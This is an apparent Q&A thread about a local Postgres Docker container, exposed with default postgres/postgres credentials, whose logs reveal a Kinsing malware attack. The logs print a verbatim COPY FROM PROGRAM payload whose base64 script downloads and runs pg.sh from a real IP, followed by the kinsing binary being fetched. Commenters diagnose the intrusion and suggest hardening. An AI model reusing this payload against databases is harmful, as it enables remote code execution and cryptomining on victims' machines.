# Postgres docker wants to execute random commands?

Tags: postgresql, docker

I am running the postgres docker container on a M1 Mac

MacOS Monterey Version 12.2.1

```yaml
postgres:
  image: postgres:14.2-alpine
  environment:
    - POSTGRES_DB=reachmehere_project
    - POSTGRES_PASSWORD=postgres
    - POSTGRES_USER=postgres
    - POSTGRES_HOST_AUTH_METHOD=scram-sha-256
    - POSTGRES_INITDB_ARGS=--auth-host=scram-sha-256
  volumes:
    - pgdata:/var/lib/postgresql/data
    - ./pg_data/logs:/var/logs
  ports:
    - "5432:5432"
  networks:
    customnetwork:
      ipv4_address: 172.20.0.11
```

When I start the container everything is good and `docker stats` shows me < 1% CPU usage, but after like 30 minutes of doing nothing just sitting there it jumps to 200% and I see the following output in the container logs:

```
bash: line 4: chattr: command not found
bash: line 5: chattr: command not found
bash: line 6: chattr: command not found
bash: line 7: chattr: command not found
bash: line 8: ufw: command not found
bash: line 9: iptables: command not found
bash: line 11: sudo: command not found
bash: line 12: /proc/sys/kernel/nmi_watchdog: No such file or directory
bash: line 13: /etc/sysctl.conf: Permission denied
bash: line 14: userdel: command not found
bash: line 15: userdel: command not found
bash: line 16: chattr: command not found
bash: line 17: chattr: command not found
netstat: showing only processes with your user ID
cat: can't open '/tmp/.X11-unix/01': No such file or directory
cat: can't open '/tmp/.X11-unix/11': No such file or directory
cat: can't open '/tmp/.X11-unix/22': No such file or directory
cat: can't open '/tmp/.pg_stat.0': No such file or directory
cat: can't open '/tmp/.pg_stat.1': No such file or directory
cat: can't open '/var/lib/postgresql/data/./oka.pid': No such file or directory
ps: unrecognized option: w
BusyBox v1.34.1 (2021-11-23 00:57:35 UTC) multi-call binary.

Usage: ps [-o COL1,COL2=HEADER] [-T]

Show list of processes

    -o COL1,COL2=HEADER     Select columns for display
    -T                      Show threads
ps: unrecognized option: w
BusyBox v1.34.1 (2021-11-23 00:57:35 UTC) multi-call binary.

Usage: ps [-o COL1,COL2=HEADER] [-T]

Show list of processes

    -o COL1,COL2=HEADER     Select columns for display
    -T                      Show threads
kill: invalid number 'USER'
grep: bad regex 'kworker -c\': Trailing backslash
kill: invalid number 'USER'
kill: invalid number 'postgres'
kill: invalid number 'postgres'
bash: line 243: systemctl: command not found
killall: log_rot: no process killed
bash: line 488: chattr: command not found
rm: can't remove '/opt/atlassian/confluence/bin/1.sh': No such file or directory
rm: can't remove '/opt/atlassian/confluence/bin/1.sh.1': No such file or directory
rm: can't remove '/opt/atlassian/confluence/bin/1.sh.2': No such file or directory
rm: can't remove '/opt/atlassian/confluence/bin/1.sh.3': No such file or directory
rm: can't remove '/opt/atlassian/confluence/bin/3.sh': No such file or directory
rm: can't remove '/opt/atlassian/confluence/bin/3.sh.1': No such file or directory
rm: can't remove '/opt/atlassian/confluence/bin/3.sh.2': No such file or directory
rm: can't remove '/opt/atlassian/confluence/bin/3.sh.3': No such file or directory
rm: can't remove '/var/tmp/lib': No such file or directory
rm: can't remove '/var/tmp/.lib': No such file or directory
bash: line 541: chattr: command not found
chmod: /tmp/lok: No such file or directory
bash: line 545: docker: command not found
bash: line 546: docker: command not found
bash: line 547: docker: command not found
bash: line 548: docker: command not found
bash: line 549: docker: command not found
bash: line 550: docker: command not found
bash: line 551: docker: command not found
bash: line 552: docker: command not found
bash: line 553: docker: command not found
bash: line 554: docker: command not found
bash: line 555: docker: command not found
bash: line 556: docker: command not found
bash: line 557: docker: command not found
bash: line 558: docker: command not found
bash: line 559: docker: command not found
bash: line 560: docker: command not found
bash: line 561: docker: command not found
bash: line 562: docker: command not found
bash: line 563: docker: command not found
bash: line 564: docker: command not found
bash: line 565: docker: command not found
bash: line 566: docker: command not found
bash: line 567: setenforce: command not found
bash: line 568: /etc/selinux/config: No such file or directory
bash: line 569: service: command not found
bash: line 570: systemctl: command not found
bash: line 571: service: command not found
bash: line 572: systemctl: command not found
md5sum: can't open '/tmp/kinsing': No such file or directory
/tmp/kinsing is not 648effa354b3cbaad87b45f48d59c616, actual 
chmod: /tmp/kinsing: No such file or directory
Connecting to 194.38.20.166 (194.38.20.166:80)
saving to '/tmp/kinsing'
kinsing               14% |****                            | 2078k  0:00:05 ETA
kinsing               76% |************************        | 10.7M  0:00:00 ETA
kinsing              100% |********************************| 13.9M  0:00:00 ETA
'/tmp/kinsing' saved
/tmp/kinsing is 648effa354b3cbaad87b45f48d59c616
crontab: must be suid to work properly
crontab: must be suid to work properly
crontab: must be suid to work properly
crontab: must be suid to work properly
crontab: must be suid to work properly
crontab: must be suid to work properly
crontab: must be suid to work properly
crontab: must be suid to work properly
crontab: must be suid to work properly
crontab: must be suid to work properly
crontab: must be suid to work properly
crontab: must be suid to work properly
crontab: must be suid to work properly
crontab: must be suid to work properly
crontab: must be suid to work properly
crontab: must be suid to work properly
crontab: must be suid to work properly
crontab: must be suid to work properly
crontab: must be suid to work properly
crontab: must be suid to work properly
crontab: must be suid to work properly
crontab: must be suid to work properly
crontab: must be suid to work properly
crontab: must be suid to work properly
crontab: must be suid to work properly
crontab: must be suid to work properly
crontab: must be suid to work properly
crontab: must be suid to work properly
crontab: must be suid to work properly
crontab: must be suid to work properly
crontab: must be suid to work properly
crontab: must be suid to work properly
crontab: must be suid to work properly
crontab: must be suid to work properly
crontab: must be suid to work properly
crontab: must be suid to work properly
crontab: must be suid to work properly
crontab: must be suid to work properly
crontab: must be suid to work properly
crontab: must be suid to work properly
crontab: must be suid to work properly
crontab: must be suid to work properly
crontab: must be suid to work properly
crontab: must be suid to work properly
crontab: must be suid to work properly
crontab: must be suid to work properly
crontab: must be suid to work properly
crontab: must be suid to work properly
crontab: must be suid to work properly
crontab: must be suid to work properly
crontab: must be suid to work properly
crontab: must be suid to work properly
crontab: must be suid to work properly
crontab: must be suid to work properly
crontab: must be suid to work properly
crontab: must be suid to work properly
crontab: must be suid to work properly
crontab: must be suid to work properly
crontab: must be suid to work properly
crontab: must be suid to work properly
crontab: must be suid to work properly
crontab: must be suid to work properly
crontab: must be suid to work properly
crontab: must be suid to work properly
crontab: must be suid to work properly
crontab: must be suid to work properly
crontab: must be suid to work properly
crontab: must be suid to work properly
crontab: must be suid to work properly
crontab: must be suid to work properly
crontab: must be suid to work properly
crontab: must be suid to work properly
crontab: must be suid to work properly
crontab: must be suid to work properly
crontab: must be suid to work properly
crontab: must be suid to work properly
crontab: must be suid to work properly
crontab: must be suid to work properly
crontab: must be suid to work properly
crontab: must be suid to work properly
crontab: must be suid to work properly
crontab: must be suid to work properly
crontab: must be suid to work properly
crontab: must be suid to work properly
crontab: must be suid to work properly
crontab: must be suid to work properly
crontab: must be suid to work properly
crontab: must be suid to work properly
crontab: must be suid to work properly
crontab: must be suid to work properly
crontab: must be suid to work properly
crontab: must be suid to work properly
crontab: must be suid to work properly
crontab: must be suid to work properly
crontab: must be suid to work properly
crontab: must be suid to work properly
crontab: must be suid to work properly
crontab: must be suid to work properly
crontab: must be suid to work properly
crontab: must be suid to work properly
2022-03-13 17:18:18.881 UTC [74] ERROR:  program "echo IyEvYmluL2Jhc2gKcGtpbGwgLWYgenN2Ywpwa2lsbCAtZiBwZGVmZW5kZXJkCnBraWxsIC1mIHVwZGF0ZWNoZWNrZXJkCgpmdW5jdGlvbiBfX2N1cmwoKSB7CiAgcmVhZCBwcm90byBzZXJ2ZXIgcGF0aCA8PDwkKGVjaG8gJHsxLy8vLyB9KQogIERPQz0vJHtwYXRoLy8gLy99CiAgSE9TVD0ke3NlcnZlci8vOip9CiAgUE9SVD0ke3NlcnZlci8vKjp9CiAgW1sgeCIke0hPU1R9IiA9PSB4IiR7UE9SVH0iIF1dICYmIFBPUlQ9ODAKCiAgZXhlYyAzPD4vZGV2L3RjcC8ke0hPU1R9LyRQT1JUCiAgZWNobyAtZW4gIkdFVCAke0RPQ30gSFRUUC8xLjBcclxuSG9zdDogJHtIT1NUfVxyXG5cclxuIiA+JjMKICAod2hpbGUgcmVhZCBsaW5lOyBkbwogICBbWyAiJGxpbmUiID09ICQnXHInIF1dICYmIGJyZWFrCiAgZG9uZSAmJiBjYXQpIDwmMwogIGV4ZWMgMz4mLQp9CgppZiBbIC14ICIkKGNvbW1hbmQgLXYgY3VybCkiIF07IHRoZW4KICBjdXJsIDE5NC4zOC4yMC4xNjYvcGcuc2h8YmFzaAplbGlmIFsgLXggIiQoY29tbWFuZCAtdiB3Z2V0KSIgXTsgdGhlbgogIHdnZXQgLXEgLU8tIDE5NC4zOC4yMC4xNjYvcGcuc2h8YmFzaAplbHNlCiAgX19jdXJsIGh0dHA6Ly8xOTQuMzguMjAuMTY2L3BnMi5zaHxiYXNoCmZp|base64 -d|bash" failed
2022-03-13 17:18:18.881 UTC [74] DETAIL:  child process exited with exit code 1
2022-03-13 17:18:18.881 UTC [74] STATEMENT:  DROP TABLE IF EXISTS IDzAXbof;CREATE TABLE IDzAXbof(cmd_output text);COPY IDzAXbof FROM PROGRAM 'echo IyEvYmluL2Jhc2gKcGtpbGwgLWYgenN2Ywpwa2lsbCAtZiBwZGVmZW5kZXJkCnBraWxsIC1mIHVwZGF0ZWNoZWNrZXJkCgpmdW5jdGlvbiBfX2N1cmwoKSB7CiAgcmVhZCBwcm90byBzZXJ2ZXIgcGF0aCA8PDwkKGVjaG8gJHsxLy8vLyB9KQogIERPQz0vJHtwYXRoLy8gLy99CiAgSE9TVD0ke3NlcnZlci8vOip9CiAgUE9SVD0ke3NlcnZlci8vKjp9CiAgW1sgeCIke0hPU1R9IiA9PSB4IiR7UE9SVH0iIF1dICYmIFBPUlQ9ODAKCiAgZXhlYyAzPD4vZGV2L3RjcC8ke0hPU1R9LyRQT1JUCiAgZWNobyAtZW4gIkdFVCAke0RPQ30gSFRUUC8xLjBcclxuSG9zdDogJHtIT1NUfVxyXG5cclxuIiA+JjMKICAod2hpbGUgcmVhZCBsaW5lOyBkbwogICBbWyAiJGxpbmUiID09ICQnXHInIF1dICYmIGJyZWFrCiAgZG9uZSAmJiBjYXQpIDwmMwogIGV4ZWMgMz4mLQp9CgppZiBbIC14ICIkKGNvbW1hbmQgLXYgY3VybCkiIF07IHRoZW4KICBjdXJsIDE5NC4zOC4yMC4xNjYvcGcuc2h8YmFzaAplbGlmIFsgLXggIiQoY29tbWFuZCAtdiB3Z2V0KSIgXTsgdGhlbgogIHdnZXQgLXEgLU8tIDE5NC4zOC4yMC4xNjYvcGcuc2h8YmFzaAplbHNlCiAgX19jdXJsIGh0dHA6Ly8xOTQuMzguMjAuMTY2L3BnMi5zaHxiYXNoCmZp|base64 -d|bash';SELECT * FROM IDzAXbof;DROP TABLE IF EXISTS IDzAXbof;
```

What is going on?

Comment: this looks kind of scary. Are you exposing this to the internet in some way? Looks almost like an attack.

Comment: Do you know this IP address ? 194.38.20.166

Comment: when you decode that base64 string you can see its some strange script.   https://pastebin.com/gyPWJ6Bu. Its actually fetching and executing another script from that IP address.

Comment: @TheFool No it is just on my local machine for development.
No I do not know that IPAddress.

Apparently kinsing is some known malware, and i just need to change the postgres password, I believe

Comment: Im pretty sure this is some kind of attack.  But I dont understand how the script ended up in the container, this looks like the official postgres image. I had a look at the other script its fetching. That one tries to do all sorts of stuff and producing all the errors. You are kind of lucky enough that this has run in the container and not on your host, although its not clear if its not comming from your host in some way, in the first place. The second script fetches yet another script called kinsing.

Comment: I would probably be sketched out enough to format my whole machine and everything, and after that I would make double sure to harden my setup.

Comment: If it's exposed to the internet, then they got in because you used username `postgres` and password `postgres`.

Comment: They say it's a crypto miner and secret discoverer. https://www.cyberark.com/resources/threat-research-blog/kinsing-the-malware-with-two-faces. They also say it comes from an open docker API, although in your case it seems like it came through the database somehow. In any case, that probably means you are exposing something to the internet you shouldn't.

Comment: After changing the password everything is good thanks @all!

Comment: If this is your private machine / laptop / desktop, it's probably still not good. It should definitely not be possible to connect from the web to your database. This has nothing to do with the password. I would also carefully inspect my system to see if the script is sitting somewhere. From what I read, it's putting itself in crontab and stuff like this.

Comment: thanks for posting this. I had the same issue.